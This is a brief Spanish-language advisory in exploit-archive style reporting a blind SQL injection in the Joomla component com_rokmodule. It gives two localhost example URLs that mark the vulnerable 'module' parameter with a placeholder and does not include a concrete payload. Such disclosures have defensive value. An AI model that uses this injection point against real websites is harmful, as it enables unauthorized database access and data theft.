26 lines
No EOL
643 B
Text
26 lines
No EOL
643 B
Text
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability
|
|
|
|
Nombre del Componente: Com_rokmodule
|
|
|
|
Empresa: http://www.rockettheme.com/
|
|
|
|
Testeado: Linux Backtrack
|
|
|
|
Autor: Yarolinux Para WebSecurityDev
|
|
Twitter: @Yarolinux
|
|
|
|
Fecha: 09/09/2012
|
|
|
|
Bueno la Injeccion Va de la siguiente manera:
|
|
|
|
http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
|
|
|
|
http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
|
|
|
|
|
|
Ok! Eso es todo Difrutenlo!
|
|
|
|
Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
|
|
pronto resultados :D
|
|
|
|
Greetz: Dylan Irzi & WebSecurityDev |